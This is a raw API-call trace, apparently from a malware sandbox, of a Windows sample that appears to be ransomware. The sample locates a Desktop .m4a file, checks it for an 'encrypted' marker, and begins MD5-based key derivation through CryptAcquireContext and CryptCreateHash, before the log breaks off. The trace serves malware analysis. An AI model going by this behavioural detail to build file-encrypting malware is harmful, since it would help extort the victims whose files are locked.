[0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0029.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0029.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0029.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0029.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0029.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.858] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0029.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd60 [0029.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cd60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0029.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0029.858] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0029.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0029.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0029.858] CloseHandle (hObject=0x128) returned 1 [0029.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0029.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0029.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0029.859] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.859] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0029.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.859] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.859] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0029.860] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.860] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0029.860] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0029.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.860] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.860] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.860] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.860] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92a2ad60, ftCreationTime.dwHighDateTime=0x1d5c4e4, ftLastAccessTime.dwLowDateTime=0x28b50320, ftLastAccessTime.dwHighDateTime=0x1d5bf09, ftLastWriteTime.dwLowDateTime=0x28b50320, ftLastWriteTime.dwHighDateTime=0x1d5bf09, nFileSizeHigh=0x0, nFileSizeLow=0x1092e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Bn6B0LdLyx0L0Guv_ Y.m4a", cAlternateFileName="BN6B0L~1.M4A")) returned 0x7c20c0 [0029.860] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.860] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.860] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92a2ad60, ftCreationTime.dwHighDateTime=0x1d5c4e4, ftLastAccessTime.dwLowDateTime=0x28b50320, ftLastAccessTime.dwHighDateTime=0x1d5bf09, ftLastWriteTime.dwLowDateTime=0x28b50320, ftLastWriteTime.dwHighDateTime=0x1d5bf09, nFileSizeHigh=0x0, nFileSizeLow=0x1092e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Bn6B0LdLyx0L0Guv_ Y.m4a", cAlternateFileName="BN6B0L~1.M4A")) returned 0x7c20c0 [0029.860] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.860] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bn6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LdLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dLyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lyx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yx0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Guv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uv_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v_ Y.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.862] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.862] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0029.862] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0029.862] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.862] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.862] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.862] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.862] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.862] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92a2ad60, ftCreationTime.dwHighDateTime=0x1d5c4e4, ftLastAccessTime.dwLowDateTime=0x28b50320, ftLastAccessTime.dwHighDateTime=0x1d5bf09, ftLastWriteTime.dwLowDateTime=0x28b50320, ftLastWriteTime.dwHighDateTime=0x1d5bf09, nFileSizeHigh=0x0, nFileSizeLow=0x1092e, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="Bn6B0LdLyx0L0Guv_ Y.m4a", cAlternateFileName="BN6B0L~1.M4A")) returned 0x7c2240 [0029.862] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0029.863] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.863] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.863] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0029.863] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0029.863] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.863] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.863] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0029.864] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0029.864] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.864] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0029.864] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.864] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.864] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.864] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.864] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.864] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.864] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0029.864] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0029.864] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.864] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: 